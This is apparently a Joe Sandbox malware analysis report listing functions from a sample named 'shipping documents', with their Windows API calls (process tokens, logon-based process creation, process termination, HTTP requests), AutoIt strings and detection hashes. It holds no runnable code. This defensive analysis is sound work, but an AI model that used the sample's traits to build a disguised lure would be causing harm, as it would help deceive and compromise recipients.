Part of subcall function 006A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A8621
Part of subcall function 006A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A8628
Part of subcall function 006A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A863E

GetLengthSid.ADVAPI32(?,00000000,006A8977), ref: 006A8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006A8DB8
HeapAlloc.KERNEL32(00000000), ref: 006A8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 006A8DD8
GetProcessHeap.KERNEL32(00000000,00000000,006A8977), ref: 006A8DEC
HeapFree.KERNEL32(00000000), ref: 006A8DF3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: cad6723fd5f520aa5a623b3531a05c08963514580aa041dff6f7342245c053f9
Instruction ID: 97023ed437081bf59d444ad642b34b110698664fd095ae251d9459a41efdc670
Opcode Fuzzy Hash: cad6723fd5f520aa5a623b3531a05c08963514580aa041dff6f7342245c053f9
Instruction Fuzzy Hash: DB11AC31901605FFDB10AFA4CC09BEEBBABFF56315F14802AE84697250CB329D00CB60

Function 006A8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006A8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 006A8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006A8B40
CloseHandle.KERNEL32(00000004), ref: 006A8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006A8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 006A8B8E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
Instruction ID: a9269abc5411c3f0b925d43366b74785068c426508f80840c9a3823dee664593
Opcode Fuzzy Hash: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
Instruction Fuzzy Hash: 01112CB2501209AFDF019FA4ED49FEA7BAAEF09304F045065FE05A2260C7759D619B60

Function 006DC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0065134D
Part of subcall function 006512F3: SelectObject.GDI32(?,00000000), ref: 0065135C
Part of subcall function 006512F3: BeginPath.GDI32(?), ref: 00651373
Part of subcall function 006512F3: SelectObject.GDI32(?,00000000), ref: 0065139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006DC1C4
LineTo.GDI32(00000000,00000003,?), ref: 006DC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006DC1E6
LineTo.GDI32(00000000,00000000,?), ref: 006DC1F6
EndPath.GDI32(00000000), ref: 006DC206
StrokePath.GDI32(00000000), ref: 006DC216

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 05c1e0f4e43417c68967758b172136e04cc090bdad8f23a8e7cb76cc45fc6112
Instruction ID: a7ab948d86f5d2d89485e2306ec0c718cb245e7df2cceb9c4bd7532b4df549be
Opcode Fuzzy Hash: 05c1e0f4e43417c68967758b172136e04cc090bdad8f23a8e7cb76cc45fc6112
Instruction Fuzzy Hash: D4111E7680010DBFDF119F95DC48FDA7FAEEF04354F048022B9194A1A1C7719E55DBA0

Function 006703A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 006703D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 006703DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006703E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006703F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006703F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00670401

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
Instruction ID: fd2c2dc1c633868f413f8aa23eea9c5f78792c13d348880b57776b812f992860
Opcode Fuzzy Hash: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
Instruction Fuzzy Hash: 97016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

Function 006B568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006B569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006B56B1
GetWindowThreadProcessId.USER32(?,?), ref: 006B56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B56E0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
Instruction ID: eaa2284347aac635a5d231ac7fca4372c0b89ccca9ae7306ec89e2c622b1dc66
Opcode Fuzzy Hash: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
Instruction Fuzzy Hash: C8F03032A42158BBE7215BA2DC0DEEF7B7DEFC6B11F04016AFA06D1160DBA15A0186B5

Function 006B74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006B74E5
EnterCriticalSection.KERNEL32(?,?,00661044,?,?), ref: 006B74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00661044,?,?), ref: 006B7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00661044,?,?), ref: 006B7510

Part of subcall function 006B6ED7: CloseHandle.KERNEL32(00000000,?,006B751D,?,00661044,?,?), ref: 006B6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 006B7523
LeaveCriticalSection.KERNEL32(?,?,00661044,?,?), ref: 006B752A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
Instruction ID: 1a529e7de8f9cc0c874bfe1fed336fed0c5bb313376ffd018708957c1e24f3a0
Opcode Fuzzy Hash: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
Instruction Fuzzy Hash: A2F0547A945612EBD7211BA4FC4C9DB772BEF45302B011532F143910B0CB755A41CB90

Function 006A8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 006A8E7F
UnloadUserProfile.USERENV(?,?), ref: 006A8E8B
CloseHandle.KERNEL32(?), ref: 006A8E94
CloseHandle.KERNEL32(?), ref: 006A8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 006A8EA5
HeapFree.KERNEL32(00000000), ref: 006A8EAC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
Instruction ID: 7bf567777ef715ef3411931ef5103153011a2bc78ea4188118cb080025d1ed8a
Opcode Fuzzy Hash: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
Instruction Fuzzy Hash: A0E0E536905001FBDB012FE5EC0C95ABF7AFF89322B119232F21AC1170CB329420DB90

Function 006A7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7C4A
CLSIDFromProgID.OLE32(?,?,00000000,006DFB80,000000FF,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7C6F
_memcmp.LIBCMT ref: 006A7C90

Strings

,,n, xrefs: 006A7A85

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,n
API String ID: 314563124-1563246951
Opcode ID: a58f3c0d6ef7bc02db760fdbb0b1e557ebcafc940e14a87689a9eda548ca5ac4
Instruction ID: 44da9b5ab90af5bd584119fd6e806371b47bf38d08d11091c9310ca2c268d6f3
Opcode Fuzzy Hash: a58f3c0d6ef7bc02db760fdbb0b1e557ebcafc940e14a87689a9eda548ca5ac4
Instruction Fuzzy Hash: FB810B75A00109EFCB04DF94C984EEEB7BAFF89315F204199E516AB250DB71AE06CF60

Function 006C8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006C8928
CharUpperBuffW.USER32(?,?), ref: 006C8A37
VariantClear.OLEAUT32(?), ref: 006C8BAF

Part of subcall function 006B7804: VariantInit.OLEAUT32(00000000), ref: 006B7844
Part of subcall function 006B7804: VariantCopy.OLEAUT32(00000000,?), ref: 006B784D
Part of subcall function 006B7804: VariantClear.OLEAUT32(00000000), ref: 006B7859

Strings

Incorrect Parameter format, xrefs: 006C8960, 006C8B22
AUTOIT.ERROR, xrefs: 006C8A3D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 8b240e90bd47b480e5834888b6c4ec7319f296b99e46de253c64a0ffb2b7cdb0
Instruction ID: 8ba9b395d33b495728f2a8862d4f872e9c24b4bd4dea6a7563198d2a13bb9335
Opcode Fuzzy Hash: 8b240e90bd47b480e5834888b6c4ec7319f296b99e46de253c64a0ffb2b7cdb0
Instruction Fuzzy Hash: D4914B756043019FC750DF28C484E6ABBE6EF89314F14896EF89A8B361DB31E946CB52

Function 006B2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0066FEC6: _wcscpy.LIBCMT ref: 0066FEE9

_memset.LIBCMT ref: 006B3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006B3187

Strings

0, xrefs: 006B3063

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: b5a1a4ad43cce50281d9ff2315518b95e62711a21f085ef5458bf1ea7f952159
Instruction ID: 918c838a24dde7a8204bca142ac9c061ba1bdf7424907af23b9dccb1b514b0fd
Opcode Fuzzy Hash: b5a1a4ad43cce50281d9ff2315518b95e62711a21f085ef5458bf1ea7f952159
Instruction Fuzzy Hash: 2051E1B17083219AD724AF2CC845AEBB7EAEF55310F044A2DF885D7391EB70CA858756

Function 006B2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006B2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 006B2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00716890,00000000), ref: 006B2D5A

Strings

0, xrefs: 006B2CA4

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
Instruction ID: 45e4ab92116adaa15462afe7d20f66d93896ec02477d3e1efb7081369eab0732
Opcode Fuzzy Hash: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
Instruction Fuzzy Hash: 8E41BFB02043029FD720DF24D855B9ABBEAEF85320F04461EF9669B391D770E944CB96

Function 006CDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CDAD9

Part of subcall function 006579AB: _memmove.LIBCMT ref: 006579F9

Strings

none, xrefs: 006CDBB4
stdcall, xrefs: 006CDB5B
winapi, xrefs: 006CDB4A
cdecl, xrefs: 006CDB30

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 9f6fbb389adeccddf529171cad5f6faa14713ea33fda93dd37404392ccd8d603
Instruction ID: 9eb80f0a7194c02952f8a953c888e960042b20d2f79010c568bc26c1c6ab330a
Opcode Fuzzy Hash: 9f6fbb389adeccddf529171cad5f6faa14713ea33fda93dd37404392ccd8d603
Instruction Fuzzy Hash: A9315EB090061AEBCF50EF54C8919FEB3B6FF05310B10866DA866A77D1DB71AE05CB94

Function 006A9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006A93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006A9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 006A9439

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Strings

ComboBox, xrefs: 006A9380
ListBox, xrefs: 006A93B5

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: b4eace0115628945aa23d12278e8e02c712b0090244005879128b8d8e33d3272
Instruction ID: 92a8b8d77937860839845057cf47fd60daae422b68fd1b91f5b7f55092001169
Opcode Fuzzy Hash: b4eace0115628945aa23d12278e8e02c712b0090244005879128b8d8e33d3272
Instruction Fuzzy Hash: 4B21B471D01108AADB14AB74DC858FFB7BADF06350F24821DF926972E1DB355E0A9A20

Function 006C1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006C1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006C1B96
InternetCloseHandle.WININET(00000000), ref: 006C1BDD

Part of subcall function 006C2777: GetLastError.KERNEL32(?,?,006C1B0B,00000000,00000000,00000001), ref: 006C278C
Part of subcall function 006C2777: SetEvent.KERNEL32(?,?,006C1B0B,00000000,00000000,00000001), ref: 006C27A1

Strings

, xrefs: 006C1B87

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 685e60d8b2193c36c7f0dc166398fa0f194b1e237b02ac9808e35abfeacb1e75
Instruction ID: f59cf3c1250a3586493c8ed2db8754036acdb45e3eba6176d4bb7e489f2265cf
Opcode Fuzzy Hash: 685e60d8b2193c36c7f0dc166398fa0f194b1e237b02ac9808e35abfeacb1e75
Instruction Fuzzy Hash: 28217CB1500208BFEB11AF609CD5FFB77EEEB4A744F10412EF506AA241EB249D059AA5

Function 006D6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006D66D0
LoadLibraryW.KERNEL32(?), ref: 006D66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006D66EC
DestroyWindow.USER32(?), ref: 006D66F4

Strings

SysAnimate32, xrefs: 006D66AB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 6c1e51131ea24b46010d50befabbdd46ba286ba536785404338a9086e5c0a018
Instruction ID: 19558a00dde203f9d9c4de753e60788de79365fe8609a1f4f7f5d6f99d89bf17
Opcode Fuzzy Hash: 6c1e51131ea24b46010d50befabbdd46ba286ba536785404338a9086e5c0a018
Instruction Fuzzy Hash: 53218E71900249ABEF104F64DC80EEB37AEEB59368F10462AF911923E0D772CC519761

Function 006B703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 006B705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B7091
GetStdHandle.KERNEL32(0000000C), ref: 006B70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006B70DD

Strings

nul, xrefs: 006B70D8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3a2c0e09262303785e10c2a92157e767813ca929f6ead1a3fac0bd20bbbad3b8
